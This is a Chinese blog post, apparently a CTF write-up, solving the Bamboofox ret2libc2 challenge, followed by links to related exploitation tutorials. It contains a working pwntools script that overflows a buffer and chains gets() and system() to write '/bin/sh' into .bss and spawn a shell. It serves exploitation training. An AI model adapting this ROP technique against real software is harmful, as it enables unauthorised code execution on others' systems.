Bamboofox ret2libc2解题过程

最新推荐文章于 2024-10-11 20:54:01 发布
最新推荐文章于 2024-10-11 20:54:01 发布
阅读量133 收藏
点赞数
文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55013445/article/details/133279943
版权
文章讲述了如何通过分析ret2libc2漏洞,利用pwn库在给定环境下构造payload,将返回地址改写并注入/bin/sh命令,实现远程代码执行的过程。作者强调了寻找可写内存空间的重要性,以填充数据并引导程序执行shell代码。
摘要由CSDN通过智能技术生成

分析

本题分析同Bamboofox ret2libc1一样,不过这里没有给出"/bin/sh"地址,所以这里需要我们自己往system()里面写入"/bin/sh"

解题

这题偏移量和ret2libc1一样,还是112
system地址和gets地址都可在IDA中找到
最终exploit.py如下

from pwn import *

context(arch = 'i386')

p = process('./ret2libc2')

gets_addr = 0x8048460

pop_ebx_ret = 0x0804843d

system_addr = 0x8048490

buf2_addr = 0x804A080 

payload = flat(['a' * 112,gets_addr,pop_ebx_ret,buf2_addr,system_addr,'a' * 4,buf2_addr])

p.sendline(payload)
p.send('/bin/sh\x00')

p.interactive()

exp思路:先填充垃圾数据,把返回地址填为gets的地址,再次输入,把参数改为buf2(.bss)的地址,接着把返回地址改为system的地址,参数为"/bin/sh"

小结

对于这类需要自己填参数的题,可以先找找有没有rwxp权限的内存空间,有的话先填充垃圾数据把返回地址改为输入函数的地址,然后参数改为shell所在空间

mick0960
关注
bamboofox-website:Bamboofox CTF培训平台
05-23
Bamboofox网站 特征 管理员面板位于admin/ url 支持多个OAuth提供程序 多课程设计 资料上传或通过远程URL 按课程或全部排名 要求 sudo apt install imagemagick sudo apt install libmysqlclient-dev Ruby和Rails版本 Ruby 2.4.0或更高版本Rails 5.2.0或更高版本 安装 bundle install rake db:migrate 跑步 rails server 在上查看 第一个注册用户将是管理员 部署 设置应用程序配置 删除config/credentials.yml.enc 参考config/credentials.yml.example并运行rails credentials:edit编辑您的应用程序配置 rm config/credentials.yml.enc r
ret2libc3
m0_49959202的博客
08-06 405
文章目录ret2libc31.程序分析2.栈帧设计3.exp编写 ret2libc3 当前的ret2libc3:无system,无”\bin\sh“ 1.程序分析 首先file一下,发现是32位程序: checksec一下,发现没有开启pie ida分析程序: 发现有个See_something()函数可以用来泄露具体给定地址内的信息: main函数内还有个Print_message(),可以用来栈溢出: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SKJoX7
PWN基础之构造ROP链(基本ROP)
weixin_46132162的博客
02-02 4622
​随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。**所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
Bamboofox ret2libc1解题过程
weixin_55013445的博客
09-25 71
Bamboofox ret2libc1解题过程
基本ROP
听鬼哥说故事
08-29 8680
随着NX保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是ROP(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上(这一条之后不再重复提及),通过利用程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而改变程序的执行流程。**所谓gadgets就是以ret结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
Performing a ret2libc Attack-InVoLuNTaRy
04-24
ret2libc攻击的核心思想在于利用目标程序调用库函数的过程来重定向控制流,从而达到执行任意代码的目的。通常,这种攻击的目标是将控制权转移到libc库中的某个函数上,例如`system()`,并传递参数来执行一个命令。 ...
ret2libc exploit
07-07
实现ret2libc攻击的过程可以分为以下几个步骤: 1. **确定目标函数**:攻击者首先需要找到一个或多个libc函数,这些函数能够帮助其实现攻击目的,如打开一个shell。 2. **定位函数地址**:由于ASLR的存在,函数的...
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
好好说话之ret2text
hollk’s blog
06-22 2124
本题为bamboofox-ret2text 题目路径: /ctf-challenges/pwn/stackoverflow/ret2text/bamboofox-ret2text 一、原理 ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadget...
绕过canary原理及其利用方式
glhdbk的博客
09-07 4307
canary简介: canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中取出一个4字节(eax)或者8字节(rax)的值存到栈上,当函数结束时会检查这个栈上的值是否和存进去的值一致,若一致则正常退出,如果是栈溢出或者其他原因导致canary的值发生变化,那么程序将执行___stack_chk_fail函数,继而终止程序。 所以如果有一道题开启了canary...
栈溢出学习
feng的博客
01-16 1947
前言 跟着ctfwiki学习,所有题目都在ctfwiki上可以找到。加油加油。 栈溢出原理 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。 看一个简单的程序: #include <stdio.h> #include <string.h> void success() { puts("You Hava already controlled it."); system("/bin/sh"); } void
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8496
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
信息安全工程师(28)机房安全分析与防护
m0_73399576的博客
10-02 1182
信息安全工程师——机房安全分析与防护篇
如何安全地大规模部署 GenAI 应用程序
网络研究观
10-06 761
将生成式人工智能融入到你的商业模式中,既会带来新的风险,也会带来新的回报。以下是如何应对这些风险。
【OCPP】ocpp1.6协议第5.19 Update Firmware章节的介绍及翻译
最新发布
qq_53871375的博客
10-11 156
在OCPP 1.6协议中,第5.19章节讨论了“Update Firmware”(更新固件)的功能。这一章节主要描述了如何通过充电站管理系统(CSMS)远程更新充电站的固件,以确保充电站能够支持最新的功能和修复已知的漏洞。该章节描述了通过远程操作更新充电站固件的流程。固件更新是维护充电站软件的一个关键部分,可以提高系统的稳定性、增加功能或修复安全问题。
ISO 26262标准下的汽车软件架构设计与安全要求
yayuanjingkeji的博客
10-08 344
ISO 26262标准下的汽车软件架构设计与安全要求ISO 26262标准,作为国际公认的汽车功能安全标准,为汽车电子和电气系统的软件开发提供了详尽的指导与规范。在汽车软件架构设计中,遵循ISO 26262标准不仅关乎产品的功能实现,更直接关系到车辆的安全性能。以下将从几个关键方面探讨ISO 26262标准下的汽车软件架构设计。
CSRF 漏洞 - 学习手册
Blue17 の 小窝
10-05 609
CSRF 漏洞从初识到挖掘全流程笔记合集
深入理解ret2libc攻击:无壳代码控制
在IT安全领域,"Performing a ret2libc Attack-InVoLuNTaRy" 是一篇关于高级攻击技术的教程,主要讲解如何利用ret2libc(Return to Library Call)漏洞进行攻击。ret2libc是一种针对栈溢出漏洞的利用方法,它让攻击...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值